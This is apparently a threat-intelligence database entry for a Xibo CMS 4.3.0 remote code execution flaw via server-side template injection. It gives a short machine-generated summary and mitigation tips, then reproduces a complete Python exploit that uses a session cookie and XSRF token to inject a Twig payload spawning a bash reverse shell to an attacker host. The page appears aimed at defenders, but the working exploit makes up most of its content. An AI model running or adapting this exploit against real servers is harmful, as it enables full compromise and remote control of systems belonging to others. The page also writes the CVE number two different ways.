Xibo CMS 4.3.0 - RCE via SSTI
Xibo CMS version 4. 3. 0 is vulnerable to remote code execution (RCE) through server-side template injection (SSTI). This vulnerability allows an attacker to execute arbitrary code on the affected system by exploiting the template processing mechanism. Exploit code is publicly available in Python, but no confirmed exploits in the wild have been reported. The vulnerability is classified as critical due to the potential impact of remote code execution.
AI Analysis
Technical Summary
The Xibo CMS 4.3.0 version contains a remote code execution vulnerability via server-side template injection (SSTI). This allows an attacker to inject malicious template code that is executed on the server, leading to arbitrary code execution. The exploit code is available in Python, indicating proof-of-concept or active exploitation potential. No patch or remediation information is provided, and the product is not a cloud service, so remediation depends on vendor updates or user action.
Potential Impact
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the server hosting Xibo CMS 4.3.0. This could lead to full system compromise, data theft, or disruption of service. No known exploits in the wild have been reported yet.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch is available, consider restricting access to the CMS interface and monitoring for suspicious activity related to template processing. Avoid exposing the CMS to untrusted networks.
Indicators of Compromise
- exploit-code: # Exploit Title: Xibo CMS - Authenticated Remote Code Execution via SSTI # Date: 2025-11-04 # Exploit Author: Cristian Branet # Vendor Homepage: https://xibosignage.com/ # Software Link: https://github.com/xibosignage/xibo-cms/ # Version: < 4.3.1 # Tested on: Linux (Ubuntu 22.04) # CVE : CVE-2025-62639 # Article: https://cristibtz.github.io/posts/CVE-2025-62369/ import requests, argparse, pyfiglet, re, json, time parser = argparse.ArgumentParser(description="This script exploits CVE-2025-62369 in Xibo CMS to get a reverse shell.", formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("-u", "--url", required=True, help="Xibo CMS server URL (e.g., http://localhost)") parser.add_argument("-s", "--session-key", required=True, help="Use the PHPSESSID") parser.add_argument("-i", "--ip", required=True, help="IP address for reverse shell") parser.add_argument("-p", "--port", required=True, help="Port for reverse shell") class Exploit: def __init__(self, url, session, ip, port): self.url = url self.session = session self.ip = ip self.port = port self.headers = { "Cookie": f"PHPSESSID={session}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" } def get_xsrf_token(self): try: response = requests.get(f"{url}/statusdashboard", headers=self.headers) except Exception as e: print(f"Error connecting to {url}: {e}") exit(1) text = response.text pattern = r'name="token" content="([a-f0-9]+)"' try: xsrf_token = re.search(pattern, text).group(1) except Exception as e: print(f"Error extracting XSRF token: {e}") exit(1) return xsrf_token def create_module_template(self, xsrf_token): timestamp = int(time.time()) headers = { "Cookie": f"PHPSESSID={session}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36", "X-XSRF-TOKEN": f"{xsrf_token}", "X-Requested-With": "XMLHttpRequest" } data = { "templateId": f"exploit_poc_{timestamp}", "title": "Template for PoC", "dataType": "article", "copyTemplateId": "", "showIn": "layout" } try: response = requests.post(f"{self.url}/developer/template", data=data, headers=headers) except Exception as e: print(f"Error creating module template: {e}") exit(1) response_info = json.loads(response.text) template_id = response_info["id"] return template_id, timestamp, f"exploit_poc_{timestamp}" def update_module_template(self, xsrf_token, template_id, name): headers = { "Cookie": f"PHPSESSID={session}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36", "X-XSRF-TOKEN": f"{xsrf_token}", "X-Requested-With": "XMLHttpRequest" } data = { "templateId":f"{name}", "title": f"Template for PoC - {name}", "dataType": "article", "showIn": "layout", "enabled": "on", "developer-template-properties": [], "properties": [], "twig": '<div style="background: red; color: white; font-size: 24px; padding: 20px;">Command Execution: {{["' + f"bash -c 'bash -i >& /dev/tcp/{ip}/{port} 0>&1'" + '"]|filter(\'system\')}} <br></div>', "hbs": "", "style": "", "head": "", "onTemplateRender": "", "onTemplateVisible": "", "isInvalidateWidget": "on" } try: response = requests.put(f"{self.url}/developer/template/{template_id}", data=data, headers=headers) except Exception as e: print(f"Error updating module template: {e}") exit(1) response_info = json.loads(response.text) return response_info["success"] def create_normal_template(self, xsrf_token): timestamp = int(time.time()) headers = { "Cookie": f"PHPSESSID={session}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36", "X-XSRF-TOKEN": f"{xsrf_token}", "X-Requested-With": "XMLHttpRequest" } data = { "folderId": 1, "name": f"exploit_poc_template_{timestamp}", "tags": "", "tagValueInput": "", "resolutionId": 1, "description": "Exploit template" } try: response = requests.post(f"{self.url}/template", data=data, headers=headers) except Exception as e: print(f"Error creating normal template: {e}") exit(1) response_info = json.loads(response.text) template_id = response_info["id"] layout_id = response_info["data"]["layoutId"] region_id = response_info["data"]["regions"][0]["regionId"] playlist_id = response_info["data"]["regions"][0]["regionPlaylist"]["playlistId"] return template_id, layout_id, region_id, playlist_id def add_rss_widget(self, xsrf_token, playlist_id, name): headers = { "Cookie": f"PHPSESSID={session}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36", "X-XSRF-TOKEN": f"{xsrf_token}", "X-Requested-With": "XMLHttpRequest" } data = { "templateId": f"{name}", } try: response = requests.post(f"{url}/playlist/widget/rss-ticker/{str(int(playlist_id) + 1)}", data=data, headers=headers) except Exception as e: print(f"Error adding RSS widget: {e}") exit(1) response_info = json.loads(response.text) widget_id = response_info["id"] return widget_id def preview_rss_widget(self, xsrf_token, widget_id, playlist_id): headers = { "Cookie": f"PHPSESSID={session}", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36", "X-XSRF-TOKEN": f"{xsrf_token}", "X-Requested-With": "XMLHttpRequest" } try: response = requests.get(f"{url}/playlist/widget/resource/{str(int(playlist_id) + 1)}/{widget_id}?preview=1&isEditor=1", headers=headers) except Exception as e: print(f"Error previewing RSS widget: {e}") exit(1) return response.status_code if __name__=="__main__": print("\n") print(pyfiglet.figlet_format("CVE-2025-62369 PoC", font="small", width=100)) print("Author: Cristian Branet") print("GitHub: github.com/cristibtz") print("Description: This script exploits CVE-2025-62369 in Xibo CMS to get a reverse shell.") print("\n") args = parser.parse_args() url = args.url session = args.session_key ip = args.ip port = args.port xibo_exploit = Exploit(url, session, ip, port) try: xsrf_token = xibo_exploit.get_xsrf_token() except Exception as e: print(f"Error getting XSRF token: {e}") exit(1) print("Retrieved XSRF token: ") print(xsrf_token) try: module_template_id, creation_time, name = xibo_exploit.create_module_template(xsrf_token) except Exception as e: print(f"Error creating module template: {e}") exit(1) print(f"Created module template with id: {module_template_id} with name: {name}") try: update_success = xibo_exploit.update_module_template(xsrf_token, module_template_id, name) except Exception as e: print(f"Error updating module template: {e}") exit(1) print(f"Updated module template with success: {update_success}") print("Creating normal template...") try: normal_template_id, layout_id, region_id, playlist_id = xibo_exploit.create_normal_template(xsrf_token) except Exception as e: print(f"Error creating normal template: {e}") exit(1) print("Created normal template with: ") print(f"Normal Template ID: {normal_template_id}") print(f"Layout ID: {layout_id}") print(f"Region ID: {region_id}") print(f"Playlist ID: {playlist_id}") print("Adding RSS widget to playlist...") try: widget_id = xibo_exploit.add_rss_widget(xsrf_token, playlist_id, name) except Exception as e: print(f"Error adding RSS widget: {e}") exit(1) print(f"Added RSS widget with ID: {widget_id}") print("Previewing RSS widget to trigger the exploit...") try: status_code = xibo_exploit.preview_rss_widget(xsrf_token, widget_id, playlist_id) except Exception as e: print(f"Error previewing RSS widget: {e}") exit(1) if status_code == 200: print("Exploit triggered successfully! Check your listener for a reverse shell.") else: print("Failed to trigger the exploit.")
Xibo CMS 4.3.0 - RCE via SSTI
Description
Xibo CMS version 4. 3. 0 is vulnerable to remote code execution (RCE) through server-side template injection (SSTI). This vulnerability allows an attacker to execute arbitrary code on the affected system by exploiting the template processing mechanism. Exploit code is publicly available in Python, but no confirmed exploits in the wild have been reported. The vulnerability is classified as critical due to the potential impact of remote code execution.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The Xibo CMS 4.3.0 version contains a remote code execution vulnerability via server-side template injection (SSTI). This allows an attacker to inject malicious template code that is executed on the server, leading to arbitrary code execution. The exploit code is available in Python, indicating proof-of-concept or active exploitation potential. No patch or remediation information is provided, and the product is not a cloud service, so remediation depends on vendor updates or user action.
Potential Impact
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the server hosting Xibo CMS 4.3.0. This could lead to full system compromise, data theft, or disruption of service. No known exploits in the wild have been reported yet.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until a patch is available, consider restricting access to the CMS interface and monitoring for suspicious activity related to template processing. Avoid exposing the CMS to untrusted networks.
Technical Details
- Edb Id
- 52516
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Xibo CMS 4.3.0 - RCE via SSTI
# Exploit Title: Xibo CMS - Authenticated Remote Code Execution via SSTI # Date: 2025-11-04 # Exploit Author: Cristian Branet # Vendor Homepage: https://xibosignage.com/ # Software Link: https://github.com/xibosignage/xibo-cms/ # Version: < 4.3.1 # Tested on: Linux (Ubuntu 22.04) # CVE : CVE-2025-62639 # Article: https://cristibtz.github.io/posts/CVE-2025-62369/ import requests, argparse, pyfiglet, re, json, time parser = argparse.ArgumentParser(description="This script exploits CVE-2025-62369... (9006 more characters)
Threat ID: 69f1f0fdcbff5d8610047e71
Added to database: 4/29/2026, 11:52:29 AM
Last enriched: 4/29/2026, 11:53:52 AM
Last updated: 4/30/2026, 3:49:54 AM
Views: 9
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.